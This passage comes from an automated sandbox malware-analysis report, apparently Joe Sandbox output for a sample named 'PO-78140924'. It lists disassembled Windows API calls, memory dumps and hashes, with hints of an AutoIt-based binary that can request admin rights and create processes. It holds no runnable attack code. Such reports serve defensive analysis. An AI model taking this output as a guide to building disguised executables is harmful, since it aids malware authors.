                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00096230
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0009623C
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00096278
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00096289
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000962C3
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 000962E3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: 93a946243ba40ca85bfc3c3e6fa67e5e725045d28238c9b29313769939f1781f
                                                • Instruction ID: a33301c88559fad507c837295fc80eb0ed00b9f4a74ff61a8f7bd3851a668015
                                                • Opcode Fuzzy Hash: 93a946243ba40ca85bfc3c3e6fa67e5e725045d28238c9b29313769939f1781f
                                                • Instruction Fuzzy Hash: 31316D72201610BFEF118F50DC8AFFA3BA9FF49761F040066FE08DA191C67A9851CBA4
                                                Function 00035F1C Relevance: 12.1, APIs: 8, Instructions: 82threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __getptd_noexit.LIBCMT ref: 00035F1D
                                                  • Part of subcall function 00039B44: GetLastError.KERNEL32(00000000,?,00038CAD,00035913,00000000,?,000389B3,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008), ref: 00039B46
                                                  • Part of subcall function 00039B44: __calloc_crt.LIBCMT ref: 00039B67
                                                  • Part of subcall function 00039B44: __initptd.LIBCMT ref: 00039B89
                                                  • Part of subcall function 00039B44: GetCurrentThreadId.KERNEL32 ref: 00039B90
                                                  • Part of subcall function 00039B44: SetLastError.KERNEL32(00000000,000389B3,?,?,?,00000000,?,00039E55,00000018,000CA1A8,00000008,00039DA2,?,?,?,0003339E), ref: 00039BA8
                                                • CloseHandle.KERNEL32(?,?,00035EFC), ref: 00035F31
                                                • __freeptd.LIBCMT ref: 00035F38
                                                • RtlExitUserThread.NTDLL(00000000,?,00035EFC), ref: 00035F40
                                                • GetLastError.KERNEL32(?,?,00035EFC), ref: 00035F70
                                                • RtlExitUserThread.NTDLL(00000000,?,?,00035EFC), ref: 00035F77
                                                • __freefls@4.LIBCMT ref: 00035F93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit__initptd
                                                • String ID:
                                                • API String ID: 3304096619-0
                                                • Opcode ID: 17dd3c6e2d9815e2c229ed7511996c5f8f6caf3255ed3a64b862b05b863a4de3
                                                • Instruction ID: 347b56e0538c98b73482483b691622614b921bed3ae61a60284c54d2fc5966d1
                                                • Opcode Fuzzy Hash: 17dd3c6e2d9815e2c229ed7511996c5f8f6caf3255ed3a64b862b05b863a4de3
                                                • Instruction Fuzzy Hash: 5C210B75404605AFDB267B78CC0669E77ECFF00711F108539F958C6262EB34DD81DA96
                                                Function 00011424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 342720227cf0bfaa008f0ee0eeef25556d83227c945272d3530ce8d6bb492e4a
                                                • Instruction ID: dd7a2e6a6de790d27cd16feac680a197931f531212243d750837087fec56bac7
                                                • Opcode Fuzzy Hash: 342720227cf0bfaa008f0ee0eeef25556d83227c945272d3530ce8d6bb492e4a
                                                • Instruction Fuzzy Hash: ED716C70904109EFDB18CF98CC49AFEBBB9FF85310F148159FA15AB251C734AA91CBA4
                                                Function 0009B385 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindow.USER32(01463B38), ref: 0009B41F
                                                • IsWindowEnabled.USER32(01463B38), ref: 0009B42B
                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0009B50F
                                                • SendMessageW.USER32(01463B38,000000B0,?,?), ref: 0009B546
                                                • IsDlgButtonChecked.USER32(?,?), ref: 0009B583
                                                • GetWindowLongW.USER32(01463B38,000000EC), ref: 0009B5A5
                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0009B5BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                • String ID:
                                                • API String ID: 4072528602-0
                                                • Opcode ID: bf7248ffef6637dfd89e15aaa9a9bdf2732c3e334a883f7c3b0d8d01196ad6b8
                                                • Instruction ID: 0f6478741535877ba4fee06b848a41c6061e840d36f1c9999592e402d564d7ba
                                                • Opcode Fuzzy Hash: bf7248ffef6637dfd89e15aaa9a9bdf2732c3e334a883f7c3b0d8d01196ad6b8
                                                • Instruction Fuzzy Hash: 98718C34605604AFEF219F64ED94FBA7BE9FF09320F14406AF955972A2C731A950FB20
                                                Function 0003DB96 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 179COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleMode.KERNEL32(?,?), ref: 0003DC3C
                                                • GetConsoleCP.KERNEL32 ref: 0003DC5A
                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 0003DD99
                                                  • Part of subcall function 00038C74: __getptd_noexit.LIBCMT ref: 00038C74
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Console__getptd_noexit$ByteCharModeMultiWide
                                                • String ID: Pp>
                                                • API String ID: 321029406-1895935624
                                                • Opcode ID: 83ed5dc42ad087f032e3d23ccc3e22e048f8d9f2008627afee2cd2cd43236fdc
                                                • Instruction ID: f661a845b0c38a66a89ce19644c03cbe63b5c120c4d7bf13c45769e8759ad1ce
                                                • Opcode Fuzzy Hash: 83ed5dc42ad087f032e3d23ccc3e22e048f8d9f2008627afee2cd2cd43236fdc
                                                • Instruction Fuzzy Hash: 59715A75B022188FDB25DB55EC80AE8B7F9BB06314F1441EAE40AE6A81C7759E81CF52
                                                Function 0006DDFA Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0006DE3D
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0006DE63
                                                • SysAllocString.OLEAUT32(00000000), ref: 0006DE66
                                                • SysAllocString.OLEAUT32(?), ref: 0006DE84
                                                • SysFreeString.OLEAUT32(?), ref: 0006DE8D
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 0006DEB2
                                                • SysAllocString.OLEAUT32(?), ref: 0006DEC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 911793ccb7e971b540574ccad5a57bad6a4924fe0f197f61b8411a81652f7a22
                                                • Instruction ID: 9a6742f1f50ba3bb84cf7863fb92f36da116590d8a6e0ae06a655e08bdbf4a76
                                                • Opcode Fuzzy Hash: 911793ccb7e971b540574ccad5a57bad6a4924fe0f197f61b8411a81652f7a22
                                                • Instruction Fuzzy Hash: D8219276B0421AAFEB60EFA8DC88CBB73EDFB19360B008526F914DF250D6759D418760
                                                Function 0006F98F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp
                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                • API String ID: 1038674560-2734436370
                                                • Opcode ID: 33aba01c4e0fb15646e40e362065cd492d98f467e08b1b4d839b3c3f476027f8
                                                • Instruction ID: bf2a248115aa74bad5ac37438de1be86c19e0284903c8b86796bc4969a58ff78
                                                • Opcode Fuzzy Hash: 33aba01c4e0fb15646e40e362065cd492d98f467e08b1b4d839b3c3f476027f8
                                                • Instruction Fuzzy Hash: 9C21FF73109512B6D231EA69BC42FFB73DDEF55310F544035F58986142E7915D82C2A6
                                                Function 0006DED3 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 0006DF18
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0006DF3E
                                                • SysAllocString.OLEAUT32(00000000), ref: 0006DF41
                                                • SysAllocString.OLEAUT32(?), ref: 0006DF62
                                                • SysFreeString.OLEAUT32(?), ref: 0006DF6B
                                                • StringFromGUID2.COMBASE(?,?,00000028), ref: 0006DF85
                                                • SysAllocString.OLEAUT32(?), ref: 0006DF93
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                • String ID:
                                                • API String ID: 3761583154-0
                                                • Opcode ID: 7aed84525589ee5794f96e84240050ba083c115a04a2921adf93e1cac6e9b5ed
                                                • Instruction ID: 821617973f22fd8fc8bf2cd025524af0517f3c373eaf22e51b3053402308ee6c
                                                • Opcode Fuzzy Hash: 7aed84525589ee5794f96e84240050ba083c115a04a2921adf93e1cac6e9b5ed
                                                • Instruction Fuzzy Hash: 04215675B04105AFEB50AFA8DC88DBB77EDFB09360B108136F915CB261D674DC418765
                                                Function 00039C66 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __init_pointers.LIBCMT ref: 00039C66
                                                  • Part of subcall function 00033307: RtlEncodePointer.NTDLL(00000000), ref: 0003330A
                                                  • Part of subcall function 00033307: __initp_misc_winsig.LIBCMT ref: 00033325
                                                  • Part of subcall function 00033307: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0003A020
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0003A034
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0003A047
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0003A05A
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0003A06D
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0003A080
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0003A093
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0003A0A6
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0003A0B9
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0003A0CC
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0003A0DF
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0003A0F2
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0003A105
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0003A118
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0003A12B
                                                  • Part of subcall function 00033307: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0003A13E
                                                • __mtinitlocks.LIBCMT ref: 00039C6B
                                                • __mtterm.LIBCMT ref: 00039C74
                                                  • Part of subcall function 00039CDC: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00039DD6
                                                  • Part of subcall function 00039CDC: _free.LIBCMT ref: 00039DDD
                                                  • Part of subcall function 00039CDC: RtlDeleteCriticalSection.NTDLL(02), ref: 00039DFF
                                                • __calloc_crt.LIBCMT ref: 00039C99
                                                • __initptd.LIBCMT ref: 00039CBB
                                                • GetCurrentThreadId.KERNEL32 ref: 00039CC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                • String ID:
                                                • API String ID: 3567560977-0
                                                • Opcode ID: af0d72053885933096d23466abd5d33dc074016cc2bba6abd314a22e2ded6932
                                                • Instruction ID: 37f281f5180a31648a13f40203ee9e5b8b1ce08aa9eb1337a985123755fa3170
                                                • Opcode Fuzzy Hash: af0d72053885933096d23466abd5d33dc074016cc2bba6abd314a22e2ded6932
                                                • Instruction Fuzzy Hash: 37F090325697521DE7777778BD076DA26CCDB01730F20062AF464C81D3EFA089414590
                                                Function 0009B669 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _memset.LIBCMT ref: 0009B678
                                                • _memset.LIBCMT ref: 0009B687
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,000D6F20,000D6F64), ref: 0009B6B6
                                                • CloseHandle.KERNEL32 ref: 0009B6C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: _memset$CloseCreateHandleProcess
                                                • String ID: o$do
                                                • API String ID: 3277943733-2948190108
                                                • Opcode ID: 645aee4ee77ae7574405bdfa5d95d404363fe99de61c2ee055316a4fcddb71f6
                                                • Instruction ID: c3de559c82d459ec0cd76820bed9a943a80824cf32c24bc72756e812b2615653
                                                • Opcode Fuzzy Hash: 645aee4ee77ae7574405bdfa5d95d404363fe99de61c2ee055316a4fcddb71f6
                                                • Instruction Fuzzy Hash: 60F0DAB2641704BAF6102765BC46FBB7A9CEB09754F004036FA09D51A6D77A5C1087B8
                                                Function 00034109 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,000340BB,00000000), ref: 00034123
                                                • GetProcAddress.KERNEL32(00000000), ref: 0003412A
                                                • RtlEncodePointer.NTDLL(00000000), ref: 00034136
                                                • RtlDecodePointer.NTDLL(00000001), ref: 00034153
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoInitialize$combase.dll
                                                • API String ID: 3489934621-340411864
                                                • Opcode ID: 72e909e6cf94d0ddf2c569dc8c5f05f057bc416afac3b346042996aca8c9bf45
                                                • Instruction ID: 853a1275e9da4c017170303a8b8dae4ac7d2a00f1e63b10176e729f226fe83d9
                                                • Opcode Fuzzy Hash: 72e909e6cf94d0ddf2c569dc8c5f05f057bc416afac3b346042996aca8c9bf45
                                                • Instruction Fuzzy Hash: 39E01A78692302AEFB506F75FC09B243BA8B716B02F508436B901D90A0CBBD92808F11
                                                Function 000341DE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000340F8), ref: 000341F8
                                                • GetProcAddress.KERNEL32(00000000), ref: 000341FF
                                                • RtlEncodePointer.NTDLL(00000000), ref: 0003420A
                                                • RtlDecodePointer.NTDLL(000340F8), ref: 00034225
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                • String ID: RoUninitialize$combase.dll
                                                • API String ID: 3489934621-2819208100
                                                • Opcode ID: e30bc7bdffe54bf2d42253281d88f405655b7b77c310950bd73a34f322bfe687
                                                • Instruction ID: 4ad7924e4df9effb853f696ea0774f626ffe3159268809055164af997d0dfef6
                                                • Opcode Fuzzy Hash: e30bc7bdffe54bf2d42253281d88f405655b7b77c310950bd73a34f322bfe687
                                                • Instruction Fuzzy Hash: BBE0B674582303ABFB509B61ED0DB153BA8B704742F504436F911F90A1CBBE9600CB21
                                                Function 00011DB3 Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 00011DDC
                                                • GetWindowRect.USER32(?,?), ref: 00011E1D
                                                • ScreenToClient.USER32(?,?), ref: 00011E45
                                                • GetClientRect.USER32(?,?), ref: 00011F74
                                                • GetWindowRect.USER32(?,?), ref: 00011F8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Rect$Client$Window$Screen
